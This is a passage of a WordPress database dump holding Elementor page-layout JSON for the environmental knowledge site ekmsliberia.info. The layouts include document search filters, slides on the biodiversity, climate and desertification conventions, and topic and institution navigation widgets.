documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"50df923\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28226,4070,'_elementor_pro_version','3.3.6'),(28228,4071,'_elementor_edit_mode','builder'),(28229,4071,'_elementor_template_type','wp-page'),(28230,4071,'_elementor_version','3.4.0'),(28231,4071,'_wp_page_template','default'),(28232,4071,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"50df923\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28234,4071,'_elementor_pro_version','3.3.6'),(28236,4072,'_elementor_edit_mode','builder'),(28237,4072,'_elementor_template_type','wp-page'),(28238,4072,'_elementor_version','3.4.0'),(28239,4072,'_wp_page_template','default'),(28240,4072,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"50df923\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"1010816\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(28242,4072,'_elementor_pro_version','3.3.6'),(28256,4054,'_elementor_controls_usage','a:7:{s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:18:\"theme-post-content\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:9:\"post-info\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:2:{s:4:\"view\";i:1;s:9:\"icon_list\";i:1;}}s:5:\"style\";a:2:{s:17:\"section_icon_list\";a:5:{s:13:\"space_between\";i:1;s:10:\"icon_align\";i:1;s:7:\"divider\";i:1;s:13:\"divider_width\";i:1;s:13:\"divider_color\";i:1;}s:18:\"section_text_style\";a:3:{s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:3;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:14:\"section_button\";a:7:{s:4:\"text\";i:1;s:4:\"link\";i:1;s:5:\"align\";i:1;s:4:\"size\";i:1;s:13:\"selected_icon\";i:1;s:10:\"icon_align\";i:1;s:11:\"icon_indent\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:7:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:16:\"background_color\";i:1;s:11:\"hover_color\";i:1;s:29:\"button_background_hover_color\";i:1;s:13:\"border_border\";i:1;s:12:\"border_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:6:\"layout\";i:1;}}}}}'),(28258,4075,'_wp_page_template','default'),(28259,4075,'_elementor_edit_mode','builder'),(28260,4075,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center 